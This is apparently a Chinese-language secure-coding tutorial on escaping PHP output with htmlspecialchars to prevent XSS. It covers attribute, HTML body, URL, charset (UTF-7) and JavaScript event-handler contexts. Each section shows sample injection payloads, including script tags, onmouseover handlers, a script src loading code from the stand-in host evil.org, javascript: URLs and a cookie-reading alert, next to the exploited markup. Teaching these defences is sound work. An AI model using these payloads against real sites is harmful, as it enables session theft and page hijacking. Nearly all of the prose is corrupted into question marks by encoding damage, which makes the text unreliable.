???????????? htmlspecialchars($str)??? & " < > ????塣
?????????? ENT_QUOTES ?????? ??????htmlspecialchars($str?? ENT_QUOTES)??????????????塣
?????????? ENT_NOQUOTES ?????????????????????????塣?????? htmlspecialchars($str?? ENT_NOQUOTES)??????& < > ????塣
????????????μ???????? XSS ?????????????
????XSS ????????????????????????????????綯????????????????????λ?? HTML ????????? Javascript ??????е???
????HTML????????????????
????Web ????У?"input"??"style"??"color" ?? HTML ??????????????????????????"input" ???? "value" ????????????????
????????1
????<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value="<?= $msg?>"></form>
????????XSS????
????Hello"><script>evil_script()</script>
??????????????滻
?????? $msg ?滻????? XSS ????:
????<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value="Hello"><script>evil_script()</script>"></form>
????????2
????<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value=<?= $msg?>></form>
???????? XSS ????
????Hello onmouseover=evil_script()
??????????????滻
?????? $msg ?滻????? XSS ????:
????<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value=Hello onmouseover=evil_script()></form>
????????
?????????? 1 ????????? XSS?????????а????? HTML ??????? < > "
?????????? 2 ????????? XSS ????????????а???????????????? HTML ????? ???? "value"?????????????????Χ??
???????????
????????htmlspecialchars($str?? ENT_QUOTES)?????? 5 ?? HTML ??????? < > &‘ “ ??壻????????????????Χ????磺
????<form…><INPUT type=text name="msg" id="msg" size=10 maxlength=8 value="<?= htmlspecialchars($msg?? ENT_QUOTES))?>"></form>
???????????
?????? input ?? value ??????壬???????????洢?????????????????????????????洢?????????????????????????????ò????????洢??????????????????????????? 5 ????????????????????壬????? XSS ????????????????????? HTML ???????????????壺
????1. ???????????????洢???????????????????
????2. ????? JavaScript ????????????????????????????????????????????????塣
????HTML???????????
????????
<b> ?????<?= $welcome_msg?></b>
????XSS????
<script>evil_script()</script>
??????????滻
??$welcome_msg ?滻????? XSS ????:
<b>?????<script>evil_script()</script></b>
????????
?????? HTML ????????£?< > ????????? HTML ????& ??????????????????????????????? < > & ???
???????????
??????????????????? htmlspecialchars()?? 5 ?? HTML ?????????壬?磺
????<b>?????<?= htmlspecialchars($welcome_msg???? ENT_NOQUOTES)?></b>
????URL???????????
????Script/Style/Img/ActiveX/Applet/Frameset… ????? src ?? href ?????????????????????????Щ URL ??????????????
????????1
<script src=<?= "$script_url>">
????XSS????
http://evil.org/evil.js
??????????滻
??$script_url?滻????? XSS ????:
<script src="http://evil.org/evil.js">
????????2
<img src=”<?= $img_url>”>
????XSS????
javascript:evil_script()
??????????滻
??$img_url?滻?????XSS????:
<img src=” javascript:evil_script()”>
????????
???????????????????? URL ???????????????????????????????????????Ч???????????????????????? URL ????????????????????????????á?????????????????????????????????? URL ?????
?????????????
???????????????????????????????????????????????????????????? content-type ??meta ?ж??壬????????????2??????????????????<script>alert(document.cookie)</script> ?? UTF-7 ???????
????+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
???????+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-??????????λ????????????????????????IE ???????????? UTF-7 ????????????????????????
???????????
????????????????????????????
????<meta http-equiv=content-type content="text/html; charset=UTF-8">
????????????JavaScript???????????????
????JavaScript ???????????? onClick/onLoad/onError/onMouseOver/ ????????????????????
????????
<input type="button" value="go to" onClick='goto_url("<?= $target_url>");'>
????XSS????
foo");evil_script("
??????????滻
HTML ???????????? JavaScript ?????????????????$target_url ?滻????? XSS ????:
<input type="button" value="go to" onClick='goto_url("foo");evil_script("");'>
???????λ?? JavaScript ???????